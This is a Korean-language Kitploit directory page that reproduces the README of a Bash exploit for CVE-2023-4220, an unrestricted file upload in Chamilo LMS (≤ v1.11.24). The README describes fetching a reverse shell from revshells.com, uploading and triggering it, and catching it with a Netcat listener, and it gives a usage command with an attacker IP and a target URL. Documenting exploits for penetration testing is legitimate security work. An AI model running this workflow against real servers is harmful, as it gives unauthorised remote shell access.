Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Chamilo-LMS-CVE-2023-4220-Exploit — Refurbish Chamilo LMS CVE-2023-4220 Bash로 작성된 익스플로잇 | Kitploit
도구/GitHubGitHub/0xdtc/chamilo-lms-cve-2023-4220-exploit
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHub0xdtc/chamilo-lms-cve-2023-4220-exploit

Chamilo-LMS-CVE-2023-4220-Exploit

Refurbish Chamilo LMS CVE-2023-4220 Bash로 작성된 익스플로잇

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
11년 전아직 검토되지 않음

Chamilo LMS CVE-2023-4220 익스플로잇

개요

이 스크립트는 Chamilo LMS 버전 ≤ v1.11.24에서 원격 코드 실행(RCE) 취약점을 악용합니다. CVE-2023-4220으로 알려진 이 취약점은 Chamilo LMS의 bigUpload.php 기능에서 파일 업로드 제한이 없기 때문에 발생하며, 공격자가 임의의 파일(예: 웹 셸)을 업로드하고 실행하여 서버에서 완전한 원격 코드 실행을 유발할 수 있습니다.

이 스크립트는 Divine Clown에 의해 개선되어 공격 과정을 단순화하고, 자동으로 리버스 셸 파일을 생성하여 대상에 업로드한 후 리스너를 실행하여 공격자가 셸에 직접 접근할 수 있도록 합니다.


CVE 상세 정보

  • CVE ID: CVE-2023-4220
  • 영향받는 소프트웨어: Chamilo LMS ≤ v1.11.24
  • 취약점 유형: 원격 코드 실행(RCE)
  • 공격 경로: /main/inc/lib/javascript/bigupload/inc/bigUpload.php에서의 제한 없는 파일 업로드

주요 기능

  • 공격자의 IP와 포트를 기반으로 revshells.com에서 리버스 셸을 자동으로 다운로드합니다.
  • 취약한 bigUpload.php 엔드포인트를 사용하여 리버스 셸을 업로드합니다.
  • 자동으로 셸을 트리거하고 직접 접근을 위한 Netcat 리스너를 엽니다.

Divine Clown의 개선 사항:

  • 셸 다운로드, 업로드 등 모든 중간 단계가 숨겨져 결과 리버스 셸만 표시되며 간편하게 사용할 수 있습니다.

사용법

root@kitploit:~
./CVE-2023-4220.sh -i <공격자_IP> -p <포트> -h <호스트_링크>

매개변수:

  • -i <공격자_IP>: 리버스 셸을 위한 공격자의 IP 주소
  • -p <포트>: Netcat 리스너를 시작할 포트
  • -h <호스트_링크>: 취약한 Chamilo LMS 인스턴스의 전체 URL

예시:

root@kitploit:~
./CVE-2023-4220.sh -i 10.10.14.15 -p 9001 -h http://target-site.com

전제 조건

  • 시스템에 Netcat이 설치되어 있어야 합니다.
  • 대상 Chamilo LMS 버전이 취약한지 확인하세요(≤ v1.11.24).
  • 침투 테스트 또는 익스플로잇 수행에 대한 적절한 권한이 있어야 합니다.

기술적 상세

  1. 이 스크립트는 revshells.com에서 리버스 셸을 다운로드하며, 공격자의 IP와 포트를 기반으로 동적으로 생성합니다.
  2. 리버스 셸은 취약한 bigUpload.php 엔드포인트에 업로드됩니다.
  3. 업로드된 파일은 서버에서 URL에 접근하여 실행됩니다.
  4. Netcat 리스너가 시작되고, 파일이 트리거되면 리버스 셸 연결이 설정되어 공격자에게 명령줄 접근 권한을 제공합니다.

법적 고지

이 도구는 오직 교육 목적과 취약점을 악용할 명시적 허가를 받은 테스트 환경에서만 사용하기 위한 것입니다. 시스템에 대한 무단 접근은 불법이며 형사 처벌을 받을 수 있습니다. 저자는 이 스크립트의 오용 또는 이로 인한 손해에 대해 책임을 지지 않습니다.


크레딧

  • 원본 익스플로잇 작성자: Ziad Sakr @Ziad-Sakr
  • 개선 및 정제: ME(Divine Clown)

추가 정보나 서식을 포함하려면 README를 자유롭게 수정하세요! 다른 것이 필요하면 알려주세요.

도구 다운로드